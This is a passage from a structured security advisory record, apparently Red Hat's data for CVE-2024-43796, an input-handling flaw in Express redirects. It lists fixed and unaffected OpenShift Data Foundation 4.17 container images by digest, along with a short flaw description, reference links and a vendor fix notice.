"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", 